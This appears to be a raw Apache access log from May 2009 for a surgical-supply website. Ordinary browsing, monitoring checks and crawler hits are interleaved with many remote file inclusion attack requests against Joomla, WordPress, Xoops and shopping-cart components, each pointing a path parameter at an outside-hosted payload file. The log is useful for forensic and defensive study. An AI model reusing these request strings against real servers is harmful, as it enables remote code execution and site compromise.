58.227.193.198 - - [15/May/2009:00:39:08 -0400] "GET /logs/access_log.Q108081400%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:08 -0400] "GET /logs/error_log.Q108060300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:08 -0400] "GET /logs/error_log.Q109021300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:08 -0400] "GET /logs/error_log.Q108061400%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:13 -0400] "GET /logs/error_log.Q108051400%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:13 -0400] "GET /logs/access_log.Q109010100%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:22 -0400] "GET /logs/access_log.Q108090300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:22 -0400] "GET /logs/error_log.Q108053000%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:27 -0400] "GET /logs/error_log.Q108070300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:27 -0400] "GET /logs/access_log.Q108122600%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:27 -0400] "GET /logs/error_log.Q108051300%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:39:31 -0400] "GET /logs/error_log.Q108052000%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [15/May/2009:00:39:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.143.81.26 - - [15/May/2009:00:41:18 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.143.81.26 - - [15/May/2009:00:41:20 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
58.227.193.198 - - [15/May/2009:00:41:34 -0400] "GET /logs/access_log.Q108091400%20%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
58.227.193.198 - - [15/May/2009:00:41:39 -0400] "GET /logs/error_log.Q109050600%20%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:41:47 -0400] "GET //index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:41:47 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:41:47 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:41:47 -0400] "GET //index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:41:47 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:41:47 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:41:52 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:41:52 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.143.81.26 - - [15/May/2009:00:42:35 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.143.81.26 - - [15/May/2009:00:42:39 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
217.18.76.16 - - [15/May/2009:00:43:36 -0400] "GET /logs/access_log.Q108110900//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
123.143.98.5 - - [15/May/2009:00:44:21 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:44:27 -0400] "GET /logs/access_log.Q108072300%20%20//index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:44:35 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [15/May/2009:00:44:40 -0400] "GET /logs/access_log.Q108072300%20%20//index.php?DOCUMENT_ROOT=http://darkn3st.fileave.com/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [15/May/2009:00:44:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.79.49 - - [15/May/2009:00:45:01 -0400] "GET /logs/access_log.Q107060500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.249.36.194 - - [15/May/2009:00:46:14 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [15/May/2009:00:46:14 -0400] "GET /logs/access_log.Q108100600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.79.49 - - [15/May/2009:00:46:16 -0400] "GET /logs/ HTTP/1.0" 200 1418 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.143.81.26 - - [15/May/2009:00:47:10 -0400] "GET //?cmd&file=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.143.81.26 - - [15/May/2009:00:47:11 -0400] "GET /logs//?cmd&file=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 1423 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
83.143.81.26 - - [15/May/2009:00:47:23 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
83.143.81.26 - - [15/May/2009:00:47:23 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 1423 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
72.30.79.49 - - [15/May/2009:00:47:35 -0400] "GET /logs/error_log.Q109020700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.2 - - [15/May/2009:00:48:02 -0400] "GET //ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
77.221.130.2 - - [15/May/2009:00:48:03 -0400] "GET /logs/access_log.Q109021800//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.2 - - [15/May/2009:00:48:03 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.221.130.2 - - [15/May/2009:00:48:19 -0400] "GET /logs/access_log.Q109020500%20%20//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.221.130.2 - - [15/May/2009:00:48:25 -0400] "GET /logs//atom.php5?page=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.221.130.2 - - [15/May/2009:00:48:25 -0400] "GET //atom.php5?page=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.221.130.2 - - [15/May/2009:00:48:25 -0400] "GET /logs/access_log.Q109030700//atom.php5?page=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.2 - - [15/May/2009:00:48:30 -0400] "GET /logs/access_log.Q108091700%20%20//atom.php5?page=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
68.113.120.154 - - [15/May/2009:00:48:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:48:32 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
77.221.130.2 - - [15/May/2009:00:48:33 -0400] "GET /logs/access_log.Q109030700%20%20//atom.php5?page=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.79.49 - - [15/May/2009:00:48:33 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 200 142012 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
68.113.120.154 - - [15/May/2009:00:48:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:48:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:48:58 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch HTTP/1.1" 200 54399 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:01 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:01 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:01 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:01 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:01 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:01 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:01 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:01 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:02 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:03 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:03 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:03 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
68.113.120.154 - - [15/May/2009:00:49:03 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20punch" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
72.30.79.49 - - [15/May/2009:00:48:35 -0400] "GET /logs/access_log.Q109051300 HTTP/1.0" 200 5889638 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.143.81.26 - - [15/May/2009:00:49:09 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
83.143.81.26 - - [15/May/2009:00:49:09 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 200 1418 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
72.30.79.49 - - [15/May/2009:00:49:32 -0400] "GET /logs/access_log.Q109050700 HTTP/1.0" 200 301885 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [15/May/2009:00:49:34 -0400] "GET /logs/access_log.Q109050700 HTTP/1.0" 200 301885 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [15/May/2009:00:49:36 -0400] "GET /logs/error_log.Q109051300 HTTP/1.0" 200 4525198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [15/May/2009:00:49:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
